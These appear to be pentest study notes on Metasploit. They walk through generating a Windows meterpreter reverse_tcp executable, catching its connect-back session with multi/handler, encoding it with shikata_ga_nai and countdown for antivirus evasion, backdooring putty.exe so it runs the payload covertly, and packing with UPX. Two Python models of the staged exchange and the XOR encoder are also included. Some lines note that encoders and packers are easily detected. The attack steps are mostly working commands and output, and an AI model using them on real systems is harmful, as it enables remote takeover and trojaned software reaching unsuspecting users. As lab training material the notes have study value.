!!! These notes are for study and exchange only; do not use them for any other purpose !!!
How to use msfpayload:
Generating a payload with msfpayload:
root@kali:~# msfpayload
Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

OPTIONS:

    -h        Help banner
    -l        List available payloads

#==>> list the available payloads:
root@kali:~# msfpayload -l

Framework Payloads (335 total)
==============================

    Name    Description
    ----    -----------
    ......
    ......

#==>> pick a payload and append O (the uppercase letter O) to show its options:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp O

       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 287
       Rank: Normal

Provided by:
  skape <mmiller@hick.org>
  sf <stephen_fewer@harmonysecurity.com>
  hdm <hdm@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
LHOST     10.10.10.130     yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to the attacker, Inject the meterpreter server DLL via the
  Reflective Dll Injection payload (staged)

#==>> LHOST and LPORT are already correct in this environment (LHOST was pre-set; on a fresh box pass it on the command line in the var=val form shown in the usage, e.g. LHOST=10.10.10.130), so generate the executable directly with X. The values baked in here are fixed: the handler must later use exactly the same payload, LHOST and LPORT.
root@kali:~# msfpayload windows/meterpreter/reverse_tcp X > test.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 287
Options: {"LHOST"=>"10.10.10.130"}
Upload the executable to the Windows XP SP2 target, then set up the handler in msfconsole:
#==>> first find the matching module
msf > search multi/handler

Matching Modules
================

   Name                    Disclosure Date  Rank    Description
   ----                    ---------------  ----    -----------
   ......
   exploit/multi/handler                    manual  Generic Payload Handler
   ......

msf > use exploit/multi/handler
msf exploit(handler) > show payloads
......

#==>> select the payload that matches the one compiled into the exe
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

#==>> review and adjust the options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 10.10.10.130
LHOST => 10.10.10.130
msf exploit(handler) > exploit

#==>> once msf is listening, run test.exe on the XP box; the stager connects back, the handler sends the stage and a session opens
[*] Started reverse handler on 10.10.10.130:4444
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 10.10.10.132
[*] Meterpreter session 1 opened (10.10.10.130:4444 -> 10.10.10.132:1047) at 2014-05-12 17:44:06 +0800

meterpreter >
#==>> the session is up
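The two log lines "Sending stage (769536 bytes)" and "Meterpreter session 1 opened" are the visible side of the staged exchange: the 287-byte stager in test.exe only knows how to connect back and pull a much larger stage over the same socket. The script below is an added example written for these notes, not Metasploit code, and models that exchange with both sides in one process. It assumes the framing used by the Windows reverse_tcp stagers (a 4-byte little-endian stage length followed by the stage body); the stage bytes and the maximum-length sanity check are this model's own additions, not something the real stager does.

```python
"""Model of the staged reverse_tcp exchange: stager connects back, handler
answers with <u32 length><stage>. Added example, not Metasploit's code."""
import socket
import struct
import threading

# Constructed stand-in for the meterpreter stage DLL (4096 arbitrary bytes,
# not a real stage).
STAGE = bytes(range(256)) * 16


def handler_serve(listen_sock, stage):
    """Handler side: accept one connection and push the stage, length-prefixed."""
    conn, peer = listen_sock.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)
    return peer


def recv_exact(sock, n):
    """Read exactly n bytes or fail; a stager loops on recv the same way."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full stage arrived")
        buf += chunk
    return bytes(buf)


def stager_connect(lhost, lport, max_stage=16 * 1024 * 1024):
    """Stager side: connect to LHOST:LPORT, read the length, read the stage.
    max_stage is this model's own sanity check, not part of the real stager."""
    with socket.create_connection((lhost, lport)) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        if length > max_stage:
            raise ValueError("implausible stage length %d" % length)
        return recv_exact(s, length)


def run_exchange(stage=STAGE):
    """Run handler and stager against each other on loopback; return the
    stage as the stager received it."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # ephemeral port stands in for LPORT 4444
    srv.listen(1)
    lport = srv.getsockname()[1]
    result = {}
    t = threading.Thread(target=lambda: result.update(peer=handler_serve(srv, stage)))
    t.start()
    got = stager_connect("127.0.0.1", lport)
    t.join()
    srv.close()
    return got


if __name__ == "__main__":
    received = run_exchange()
    print("stager received %d bytes, intact: %s" % (len(received), received == STAGE))
```

Two practical consequences follow from this shape. First, the handler must be listening before test.exe runs, or the stager's connect simply fails. Second, from a defender's point of view the tell is not the tiny stager but the large length-prefixed blob the server pushes immediately after the TCP handshake, which is why staged meterpreter is easy to spot on an unencrypted reverse_tcp channel.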
A payload generated directly with msfpayload is very easily flagged as malware, so some AV evasion work is needed. Note the site https://www.virustotal.com/zh-cn for online scanning; keep in mind that samples uploaded there are shared with AV vendors, so do not upload a payload you still intend to use.
msfencode:
root@kali:~/payloadtest# msfencode -h

    Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

#==>> the available encoders
root@kali:~/payloadtest# msfencode -l

Framework Encoders
==================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/generic_sh                good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
A simple usage example:
#==>> generate the payload with msfpayload, emit the raw bytes with R and pipe them into msfencode; encode once with shikata_ga_nai, write exe format, name the output test2.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -o test2.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>> same thing in two steps: save the raw bytes to test.raw, then feed that file to msfencode with -i; encode once with shikata_ga_nai, write exe format, name the output test3.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R > test.raw
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o test3.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>> chain two encoders: encode test.raw once with shikata_ga_nai and emit raw bytes (-t raw), pipe them into a second msfencode that encodes once more with countdown and writes exe format, output test4.exe
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -i test.raw -t raw | msfencode -e x86/countdown -c 1 -t exe -o test4.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/countdown succeeded with size 332 (iteration=1)

#==>> encode test.raw once with shikata_ga_nai, write exe format, name the output sickputty.exe; instead of the default EXE template use putty.exe (-x), and keep the template working (-k) so that sickputty.exe still runs putty while the payload runs in a new thread
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o sickputty.exe -x ./putty.exe -k
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

Note how the size grows from 287 to 314 and then 332 bytes: every pass prepends a decoder stub and re-encodes the whole previous output, stub included. Encoders were designed to avoid bad characters (the -b option) and to keep a payload intact through filters, not to defeat AV; the decoder stubs themselves are well known, so an encoded payload is still readily detected.
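shikata_ga_nai is listed above as a "Polymorphic XOR Additive Feedback Encoder". The script below is an added example written for these notes, not Metasploit's encoder, and models that family in Python: each dword of the payload is XORed with a key, and the just-decoded dword is folded back into the key before the next one, so a one-byte change anywhere alters everything after it, and a fresh random key gives a different output every run (the "polymorphic" part). It also shows, by hand, the check behind msfencode's -b option: both the encoded bytes and the key embedded in the decoder stub must be free of the forbidden characters, which is why an encoder retries with new keys and can fail. The sample bytes are a constructed stand-in, not a real payload, and the key-selection routine is this model's own.

```python
"""Model of an XOR additive-feedback encoder (the family shikata_ga_nai
belongs to) plus a bad-character check. Added example, not Metasploit code."""
import os
import struct

# Constructed sample input (21 arbitrary bytes with embedded NULs), not real shellcode.
SAMPLE = bytes.fromhex("fce8820000006089e531c0648b50308b520c8b5214")


def pad4(data: bytes) -> bytes:
    """Pad to a whole number of dwords (an encoder would use NOPs for this)."""
    return data + b"\x90" * (-len(data) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each dword with key, then add the plaintext dword to the key."""
    data = pad4(payload)
    out = bytearray()
    for off in range(0, len(data), 4):
        plain = struct.unpack_from("<I", data, off)[0]
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF      # feedback: key depends on all earlier dwords
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """What the decoder stub does at run time: xor the dword in place, then
    add the now-decoded dword to the key. Returns the padded plaintext."""
    out = bytearray()
    for off in range(0, len(blob), 4):
        plain = struct.unpack_from("<I", blob, off)[0] ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def bad_chars(blob: bytes, avoid: bytes) -> set:
    """Set of bytes from `avoid` that occur in blob (the check behind -b)."""
    return {b for b in avoid if b in blob}


def pick_key(payload: bytes, avoid: bytes, tries: int = 10000) -> int:
    """Random key whose encoded output AND whose own 4 bytes (they sit in the
    stub as an immediate) contain none of `avoid`; raises if none is found."""
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        if bad_chars(key.to_bytes(4, "little"), avoid):
            continue
        if not bad_chars(encode(payload, key), avoid):
            return key
    raise ValueError("failed to encode: no key avoids the bad characters")


def demo(avoid: bytes = b"\x00") -> dict:
    """Encode SAMPLE twice with independent keys; show round trip and polymorphism."""
    k1, k2 = pick_key(SAMPLE, avoid), pick_key(SAMPLE, avoid)
    e1, e2 = encode(SAMPLE, k1), encode(SAMPLE, k2)
    return {
        "round_trip_ok": decode(e1, k1)[: len(SAMPLE)] == SAMPLE,
        "no_bad_chars": not bad_chars(e1, avoid),
        "differs_across_runs": e1 != e2 or k1 == k2,
        "encoded_size": len(e1),
    }


if __name__ == "__main__":
    print(demo())
```

The real shikata_ga_nai stub also uses an FPU instruction to find its own address and randomises register choice and instruction order, which this model leaves out; the arithmetic above is the part that matters for understanding why -c N iterations each add a stub and why `-b '\x00\xff'` can make an encoder give up.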
UPX:
root@kali:~/payloadtest# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net

root@kali:~/payloadtest# upx -h
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  --best compress best (can be slow for big files)
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give this help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  --no-color, --mono, --color, --no-progress   change look
Compression tuning options:
  --brute             try all available compression methods & filters [slow]
  --ultra-brute       try even more compression variants [very slow]
Backup options:
  -k, --backup        keep backup files
  --no-backup         no backup files [default]
Overlay options:
  --overlay=copy      copy any extra data attached to the file [default]
  --overlay=strip     strip any extra data attached to the file [DANGEROUS]
  --overlay=skip      don't compress a file with an overlay
Options for djgpp2/coff:
  --coff              produce COFF output [default: EXE]
Options for dos/com:
  --8086              make compressed com work on any 8086
Options for dos/exe:
  --8086              make compressed exe work on any 8086
  --no-reloc          put no relocations in to the exe header
Options for dos/sys:
  --8086              make compressed sys work on any 8086
Options for ps1/exe:
  --8-bit             uses 8 bit size compression [default: 32 bit]
  --8mib-ram          8 megabyte memory limit [default: 2 MiB]
  --boot-only         disables client/host transfer compatibility
  --no-align          don't align to 2048 bytes [enables: --console-run]
Options for watcom/le:
  --le                produce LE output [default: EXE]
Options for win32/pe, rtm32/pe & arm/pe:
  --compress-exports=0   do not compress the export section
  --compress-exports=1   compress the export section [default]
  --compress-icons=0     do not compress any icons
  --compress-icons=1     compress all but the first icon
  --compress-icons=2     compress all but the first icon directory [default]
  --compress-icons=3     compress all icons
  --compress-resources=0 do not compress any resources at all
  --keep-resource=list   do not compress resources specified by list
  --strip-relocs=0       do not strip relocations
  --strip-relocs=1       strip relocations [default]
file..   executables to (de)compress

This version supports:
  AMD64-darwin.macho             Mach/AMD64
  ARMEL-darwin.macho             Mach/ARMEL
  amd64-linux.elf                linux/ElfAMD
  amd64-linux.kernel.vmlinux     vmlinux/AMD64
  arm-linux.elf                  linux/armel
  arm-linux.kernel.vmlinux       vmlinux/armel
  arm-wince.pe                   arm/pe
  armeb-linux.elf                linux/armeb
  armeb-linux.kernel.vmlinux     vmlinux/armeb
  armel-linux.kernel.vmlinuz     vmlinuz/armel
  fat-darwin.macho               Mach/fat
  i086-dos16.com                 dos/com
  i086-dos16.exe                 dos/exe
  i086-dos16.sys                 dos/sys
  i386-bsd.elf.execve            BSD/386
  i386-darwin.macho              Mach/i386
  i386-dos32.djgpp2.coff         djgpp2/coff
  i386-dos32.tmt.adam            tmt/adam
  i386-dos32.watcom.le           watcom/le
  i386-freebsd.elf               BSD/elf386
  i386-linux.elf                 linux/elf386
  i386-linux.elf.execve          linux/386
  i386-linux.elf.shell           linux/sh386
  i386-linux.kernel.bvmlinuz     bvmlinuz/386
  i386-linux.kernel.vmlinux      vmlinux/386
  i386-linux.kernel.vmlinuz      vmlinuz/386
  i386-netbsd.elf                netbsd/elf386
  i386-openbsd.elf               opnbsd/elf386
  i386-win32.pe                  win32/pe
  m68k-atari.tos                 atari/tos
  mips-linux.elf                 linux/mipseb
  mipsel-linux.elf               linux/mipsel
  mipsel.r3000-ps1               ps1/exe
  powerpc-darwin.macho           Mach/ppc32
  powerpc-linux.elf              linux/ElfPPC
  powerpc-linux.kernel.vmlinux   vmlinux/ppc32

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net

root@kali:~/payloadtest#
A simple usage example:
#==>> pack test4.exe at compression level 5
root@kali:~/payloadtest# upx -5 test4.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73802 ->     48128   65.21%    win32/pe     test4.exe

Packed 1 file.

UPX rewrites the file in place; use -o to write a separate output or -k to keep a backup. Bear in mind that UPX is a well-known packer whose stub and section layout every AV engine recognises, and `upx -d` restores the original bytes, so packing on its own changes the file's hash but does little against detection.
Other references:
【 http://www.offensive-security.com/metasploit-unleashed/Msfpayload 】